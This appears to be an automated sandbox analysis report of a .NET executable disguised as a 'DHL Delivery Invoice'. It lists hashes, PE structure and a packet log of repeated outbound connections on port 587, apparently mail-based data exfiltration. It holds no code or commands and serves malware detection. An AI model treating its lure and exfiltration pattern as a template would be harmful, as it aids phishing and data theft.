                                                                                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                Entropy (8bit):7.465213437585276
                                                                                                                                TrID:
                                                                                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                                • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                File name:DHL Delivery Invoice.exe
                                                                                                                                File size:1'000'448 bytes
                                                                                                                                MD5:9af85d4623cafa79192f542727a6e923
                                                                                                                                SHA1:3739dbeeec123626e43210a4daf52d07b2a4247e
                                                                                                                                SHA256:320bf0a79235fdbfd5d1adadcfc530e134d9cf3aa67bfb5c63dfddbc3bb3963f
                                                                                                                                SHA512:ac7022aaa01fb838f8e61fadff6bfcd1071812aa9048ed9fbc176a4e45c589c0095b976cf8255643d7f8c8483ebbb70ed6b72bceaa4e4333cd3d5399ebcd1c14
                                                                                                                                SSDEEP:24576:YCokCSN9N5mSXYodhsVQ2FGnTM8NUFBl6TP:Bokn5mSXbhmQ2FGTM8q6TP
                                                                                                                                TLSH:95258C983210B19FC857C9728964DD74E6606CAA930BD303A1E759EFFD0E59BDE140F2
                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....bFg..............0..*...........H... ...`....@.. ....................................@................................
                                                                                                                                Icon Hash:53084c444c441845
                                                                                                                                Entrypoint:0x4f48be
                                                                                                                                Entrypoint Section:.text
                                                                                                                                Digitally signed:false
                                                                                                                                Imagebase:0x400000
                                                                                                                                Subsystem:windows gui
                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                Time Stamp:0x674662C8 [Wed Nov 27 00:07:36 2024 UTC]
                                                                                                                                TLS Callbacks:
                                                                                                                                CLR (.Net) Version:
                                                                                                                                OS Version Major:4
                                                                                                                                OS Version Minor:0
                                                                                                                                File Version Major:4
                                                                                                                                File Version Minor:0
                                                                                                                                Subsystem Version Major:4
                                                                                                                                Subsystem Version Minor:0
                                                                                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                                Instruction
                                                                                                                                jmp dword ptr [00402000h]
                                                                                                                                add byte ptr [eax], al
| Name | Virtual Address | Virtual Size | Is in Section |
| --- | --- | --- | --- |
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0xf486c | 0x4f | .text |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xf6000 | 0x1520 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xf8000 | 0xc | .reloc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |
| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
| .text | 0x2000 | 0xf28c4 | 0xf2a00 | b469a44186b250cddaacb7fb878a9a35 | False | 0.7769191138588356 | data | 7.469334701221808 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rsrc | 0xf6000 | 0x1520 | 0x1600 | 4e4553b043c291adb7ae5eea1900bac8 | False | 0.7562144886363636 | data | 6.977709123114407 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0xf8000 | 0xc | 0x200 | 4f0228de4f34f502e364ae9eba53014b | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |
| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
| --- | --- | --- | --- | --- | --- | --- |
| RT_ICON | 0xf6130 | 0xfbe | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.892803970223325 |
| RT_GROUP_ICON | 0xf70f0 | 0x14 | data | | | 1.05 |
| RT_VERSION | 0xf7104 | 0x22c | data | | | 0.49640287769784175 |
| RT_MANIFEST | 0xf7330 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347 |
| DLL | Import |
| --- | --- |
| mscoree.dll | _CorExeMain |
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                Nov 27, 2024 19:15:20.700320005 CET5874973577.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:20.700835943 CET49735587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:15:20.768886089 CET44349737104.26.12.205192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:20.768968105 CET49737443192.168.2.4104.26.12.205
                                                                                                                                Nov 27, 2024 19:15:20.771281004 CET49737443192.168.2.4104.26.12.205
                                                                                                                                Nov 27, 2024 19:15:20.771295071 CET44349737104.26.12.205192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:20.771647930 CET44349737104.26.12.205192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:20.886841059 CET49737443192.168.2.4104.26.12.205
                                                                                                                                Nov 27, 2024 19:15:20.929698944 CET49737443192.168.2.4104.26.12.205
                                                                                                                                Nov 27, 2024 19:15:20.960513115 CET5874973577.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:20.971335888 CET44349737104.26.12.205192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:21.294713020 CET5874973577.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:21.294845104 CET5874973577.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:21.294857025 CET5874973577.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:21.294910908 CET49735587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:15:21.295288086 CET5874973577.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:21.295352936 CET49735587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:15:21.298644066 CET44349737104.26.12.205192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:21.298728943 CET44349737104.26.12.205192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:21.298866987 CET49737443192.168.2.4104.26.12.205
                                                                                                                                Nov 27, 2024 19:15:21.299024105 CET49735587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:15:21.301547050 CET49737443192.168.2.4104.26.12.205
                                                                                                                                Nov 27, 2024 19:15:21.452250957 CET5874973577.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:21.784466982 CET5874973577.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:21.788042068 CET49735587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:15:21.856200933 CET49738587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:15:21.913338900 CET5874973577.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:21.987261057 CET5874973877.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:21.987473965 CET49738587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:15:22.245820999 CET5874973577.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:22.246975899 CET49735587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:15:22.378475904 CET5874973577.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:22.709844112 CET5874973577.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:22.710127115 CET49735587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:15:22.843816042 CET5874973577.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:23.332796097 CET5874973577.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:23.333081007 CET49735587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:15:23.454730988 CET5874973577.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:23.552289963 CET5874973877.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:23.554558992 CET49738587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:15:23.699120045 CET5874973877.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:23.803169966 CET5874973577.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:23.803405046 CET49735587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:15:23.928072929 CET5874973577.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:24.041109085 CET5874973877.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:24.041301966 CET49738587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:15:24.303024054 CET5874973877.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:24.370984077 CET5874973577.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:24.371203899 CET49735587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:15:24.514043093 CET5874973577.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:24.642561913 CET5874973877.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:24.646672010 CET49738587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:15:24.797621965 CET5874973877.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:24.846036911 CET5874973577.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:24.848651886 CET49735587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:15:24.848712921 CET49735587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:15:24.848731041 CET49735587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:15:24.848747969 CET49735587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:15:24.974776983 CET5874973577.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:24.974814892 CET5874973577.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:24.974823952 CET5874973577.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:24.974836111 CET5874973577.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:25.138978958 CET5874973877.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:25.139090061 CET5874973877.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:25.139105082 CET5874973877.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:25.139167070 CET49738587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:15:25.139583111 CET5874973877.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:25.140017986 CET49738587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:15:25.141544104 CET49738587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:15:25.283777952 CET5874973877.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:25.623629093 CET5874973877.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:25.637624979 CET49738587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:15:25.926453114 CET5874973877.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:26.024213076 CET5874973577.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:26.074389935 CET49735587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:15:26.108777046 CET5874973877.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:26.109174013 CET49738587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:15:26.305171013 CET5874973877.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:26.647727013 CET5874973877.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:26.648104906 CET49738587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:15:26.821324110 CET5874973877.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:27.198755026 CET5874973877.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:27.199034929 CET49738587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:15:27.353480101 CET5874973877.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:27.713582039 CET5874973877.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:27.713826895 CET49738587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:15:27.834794044 CET5874973877.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:28.275034904 CET5874973877.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:28.275240898 CET49738587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:15:28.497443914 CET5874973877.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:28.836848021 CET5874973877.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:28.837738991 CET49738587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:15:28.837807894 CET49738587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:15:28.837821960 CET49738587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:15:28.837861061 CET49738587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:15:28.981385946 CET5874973877.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:28.984863043 CET5874973877.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:28.984903097 CET5874973877.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:28.984915018 CET5874973877.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:29.998846054 CET5874973877.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:30.043137074 CET49738587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:16:33.897849083 CET49735587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:16:34.019594908 CET5874973577.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:16:34.352909088 CET5874973577.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:16:34.352931023 CET5874973577.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:16:34.353164911 CET49735587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:16:34.353527069 CET49735587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:16:34.354939938 CET49820587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:16:34.603018999 CET5874973577.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:16:34.603032112 CET5874982077.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:16:34.603113890 CET49820587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:16:35.989707947 CET5874982077.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:16:35.989877939 CET49820587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:16:36.122745037 CET5874982077.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:16:36.458970070 CET5874982077.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:16:36.460949898 CET49820587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:16:36.581135988 CET5874982077.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:16:36.917356968 CET5874982077.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:16:36.917807102 CET49820587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:16:37.044136047 CET5874982077.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:16:37.382329941 CET5874982077.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:16:37.382502079 CET5874982077.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:16:37.382514954 CET5874982077.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:16:37.382589102 CET49820587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:16:37.383014917 CET5874982077.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:16:37.384706974 CET49820587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:16:37.387521029 CET49820587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:16:37.509788990 CET5874982077.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:16:37.846482038 CET5874982077.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:16:37.855959892 CET49820587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:16:37.990036011 CET5874982077.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:16:38.326464891 CET5874982077.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:16:38.326879978 CET49820587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:16:38.453915119 CET5874982077.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:16:38.790390015 CET5874982077.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:16:38.790705919 CET49820587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:16:38.910840988 CET5874982077.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:16:39.266393900 CET5874982077.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:16:39.270910978 CET49820587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:16:39.394813061 CET5874982077.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:16:39.735235929 CET5874982077.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:16:39.735488892 CET49820587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:16:39.862345934 CET5874982077.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:16:59.368091106 CET5874985777.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:16:59.381056070 CET5874985777.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:16:59.425858974 CET5874985777.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:16:59.462304115 CET5874985777.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:16:59.462599993 CET5874985777.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:16:59.462908983 CET5874985777.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:16:59.462943077 CET5874985777.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:16:59.484035015 CET5874985777.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:16:59.484045029 CET5874985777.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:16:59.488137007 CET5874985777.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:16:59.488322020 CET5874985777.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:16:59.501698971 CET5874985777.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:16:59.501714945 CET5874985777.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:16:59.545829058 CET5874985777.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:16:59.545840025 CET5874985777.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:16:59.545909882 CET5874985777.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:16:59.569858074 CET5874985777.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:16:59.569915056 CET5874985777.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:16:59.582483053 CET5874985777.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:16:59.582859039 CET5874985777.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:16:59.604619980 CET5874985777.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:16:59.604630947 CET5874985777.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:16:59.604662895 CET5874985777.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:16:59.608947992 CET5874985777.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:16:59.609025002 CET5874985777.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:16:59.622514963 CET5874985777.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:17:00.424552917 CET5874985777.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:17:00.640322924 CET49857587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:17:03.284244061 CET49857587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:17:03.404167891 CET5874985777.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:17:03.736423969 CET5874985777.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:17:03.736685991 CET5874985777.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:17:03.736728907 CET49857587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:17:03.737293005 CET49857587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:17:03.740154028 CET49882587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:17:04.030088902 CET5874985777.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:17:04.030102015 CET5874988277.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:17:04.030185938 CET49882587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:17:05.782105923 CET5874988277.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:17:05.782222986 CET49882587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:17:05.902468920 CET5874988277.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:17:06.368886948 CET5874988277.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:17:06.371643066 CET49882587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:17:06.530206919 CET5874988277.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:17:06.877026081 CET5874988277.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:17:06.878169060 CET49882587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:17:07.030009031 CET5874988277.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:17:07.378082037 CET5874988277.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:17:07.378199100 CET5874988277.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:17:07.378211975 CET5874988277.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:17:07.378248930 CET49882587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:17:07.378648996 CET5874988277.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:17:07.378694057 CET49882587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:17:07.380584002 CET49882587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:17:07.516077995 CET5874988277.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:17:07.863130093 CET5874988277.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:17:07.866014957 CET49882587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:17:07.986227989 CET5874988277.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:17:08.091403961 CET49882587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:17:08.161283970 CET49891587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:17:08.233704090 CET5874988277.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:17:08.233762980 CET49882587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:17:08.287864923 CET5874989177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:17:08.288295031 CET49891587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:17:09.569925070 CET5874989177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:17:09.573782921 CET49891587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:17:09.694214106 CET5874989177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:17:10.028413057 CET5874989177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:17:10.028656960 CET49891587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:17:10.211822987 CET5874989177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:17:10.544131994 CET5874989177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:17:10.544528961 CET49891587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:17:10.664624929 CET5874989177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:17:10.997719049 CET5874989177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:17:10.997795105 CET5874989177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:17:10.997808933 CET5874989177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:17:10.997999907 CET49891587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:17:11.190195084 CET5874989177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:17:11.194173098 CET49891587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:17:11.314518929 CET5874989177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:17:11.644793034 CET5874989177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:17:11.647202969 CET49891587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:17:11.773546934 CET5874989177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:17:12.104135990 CET5874989177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:17:12.104516029 CET49891587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:17:12.224504948 CET5874989177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:17:12.554831028 CET5874989177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:17:12.582194090 CET49891587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:17:12.706399918 CET5874989177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:17:13.056360006 CET5874989177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:17:13.056643963 CET49891587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:17:13.194618940 CET5874989177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:17:13.528793097 CET5874989177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:17:13.529525995 CET49891587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:17:13.682893991 CET5874989177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:17:14.168272018 CET5874989177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:17:14.168642044 CET49891587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:17:14.295445919 CET5874989177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:17:14.625953913 CET5874989177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:17:14.634744883 CET49891587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:17:14.634744883 CET49891587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:17:14.634829998 CET49891587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:17:14.635032892 CET49891587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:17:14.638145924 CET49891587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:17:14.795629978 CET5874989177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:17:14.795644045 CET5874989177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:17:14.795711994 CET49891587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:17:14.801033020 CET5874989177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:17:14.801045895 CET5874989177.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:17:14.801096916 CET49891587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:17:14.803086042 CET5874989177.88.21.158192.168.2.4
